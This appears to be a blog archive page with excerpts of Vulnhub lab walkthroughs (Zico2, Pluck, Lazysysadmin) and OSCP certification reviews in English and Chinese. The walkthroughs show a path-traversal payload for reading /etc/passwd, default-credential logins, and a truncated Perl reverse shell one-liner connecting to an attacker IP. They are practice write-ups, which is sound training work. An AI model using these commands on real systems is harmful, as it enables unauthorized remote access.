發表文章

目前顯示的是 2017的文章

Vulnhub Zico2: 1 Walkthrough

圖片
This article is walk through about zico machine in vulnub VM can download from here: https://www.vulnhub.com/entry/zico2-1,210/ As a shortcut, the method I use: LFI operation system exploit Let's Start: As always, start finding the IP for machine, mine is 172.16.194.203 nmap scan, find port open on 22,80,111 dirb scan, found interesting dbadmin folder after browse, found php login with password "admin" After login, found version is phpLiteAdmin 1.9.3 phpLiteAdmin 1.9.3 is vulnerable to Remote Code Execution https://www.exploit-db.com/exploits/24044/ After using RCE, for example I can execute "locate nc" in victim machine: Exploit: After some try and error, I found I can use perl reverse shell found other kinds of reverse shell-> locate perl in /usr/bin/perl ->do  /usr/bin/perl -h will give feedback /usr/bin/perl -e 'use Socket;$i="172.16.194.142";$p=1234;socket(...

Vulnhub Pluck 1 Walk Through

圖片
This article is walk through for Pluck1 boot2root machine. Can be download from vulnhub: https://www.vulnhub.com/entry/pluck-1,178/ As a shortcut, exploit knowledge I use in this machine:  LFI Shell escape SUID exploit Let's start First as always, find the address by netdiscover or arp-scan -r is for 'range' option Information Gathering After found address, use nmap to scan which port is open, we got 22, 80, 3306 First start with http, we see a page and with some option on the top When I browse the About option, it shows some file with URL page=about.php It means it could be LFI if it don't have sanitize input So next I try to put page=../../../../../etc/passwd  Bingo!  Got passwd file and on the bottom line there is an interesting user name backup with a script file Use LFI again to see what's inside this file content is  we can get in via tftp and in file /back...

Vulnhub Lazysysadmin walk through

圖片
This is writeup for Vulnhub machine: Lazysysadmin Machine can be download from here: https://www.vulnhub.com/entry/lazysysadmin-1,205/ Target IP is 172.16.194.199 Next, run nmap scan: Found port 22, 80, 139, 445, 3306, 6667 I start with http scan Found wordpress and phpmyadmin, looks really interesting! Try to dig more with wpsccan and see the site: There is "My name is togie", this looks interesting, maybe the system's username or something else Run wpscan: Try some default credentials on wordpress login, but not work... After I cannot dig anything, I try to turn into samba service: Next, try to access the server with smbclient: Great! We can access without any password. And we have file name deets.txt, open on browser and got: Try again on wordpress, but not work. Next file is default password file wp-config.php After get the file, open it and ...

Offensive Security Certified Professional Review

圖片
1. Introduction There are tons of certification in cybersecurity, for example, CEH, Security+, CISSP....but OSCP is known for its hands on experience and 24 hour exam. 2. Before OSCP.... 2.1 Material recommend There are some resource I would like to highlight before really step in OSCP's course. Although OSCP is the entry level cert in offsec, it still have lots knowledge Offsec expect people knows. Vulnhub: contain lots vulnerable machine, can download and do it locally https://www.vulnhub.com Hackthebox: Need VPN to their network, similar to OSCP's lab, really good resource before OSCP https://www.hackthebox.eu/ 2.2 Course Intro Official Sire is  https://www.offensive-security.com  , and before take exam, need to take their PWK course, here is syllabus  https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf Course have three types: Course + 30/60/90 days lab, can be found here: https://www.offensive-security.com/information-s...

Offensive Security Certified Professional (OSCP) 滲透測試證照經驗分享

圖片
1. 前言 在資訊安全的證照中, 有許多證照以及課程可以學習 像是CEH, Security+, CISSP. 但真正以實作滲透測試為主的, OSCP算是最大宗. 在台灣並不算很出名...但在國外算是小有名氣的證照之一. 國外的分享數量非常多不在話下, 所以這篇文章將以中文做分享, 希望能藉此機會拋磚引玉一下 2. OSCP介紹與先修材料推薦 2.1 先修材料推薦 由於 OSCP 對修課者會有一定的要求, 有些人或許會好奇, 如何才知道自己是否準備好可以來上課了? 有些資源是我個人很推薦在上課之前可以先參考練習一下: https://www.vulnhub.com  (提供很多脆弱虛擬機可以下載來練習, 網路上很多人有分享解法, 可以一步一步學習依樣畫葫蘆) https://www.hackthebox.eu  (需要用官網提供的VPN進入他的 Lab環境, 跟OSCP Lab類似, 由於是免費的所以並沒有提供教材. 但是是很棒的資源. 他有個前提是要能夠破解官網註冊步驟) 2.2 課程簡介 Lab購買方式 官網是  https://www.offensive-security.com  , 要參與考試之前必須先上他們的線上課程, 課程大綱的網址如下:  https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf 他的課程分為三種 (買lab同時會包含一次的考試, 單買考試是 一次60美金 以漲價變成150美金): Course + 30 days lab Course + 60 days lab Course + 90 days lab 詳細價格在 https://www.offensive-security.com/information-security-training/penetration-testing-training-kali-linux/ 可以發現其實差別只在lab天數. 不建議購買30天lab....因為有很大機會會沒有足夠時間做lab. 但是在購買過Course package後是可以單獨購買lab時數的. (很害羞的說我lab續了兩次, 因為小弟經驗不足實在破不完lab) 課程包括了PDF...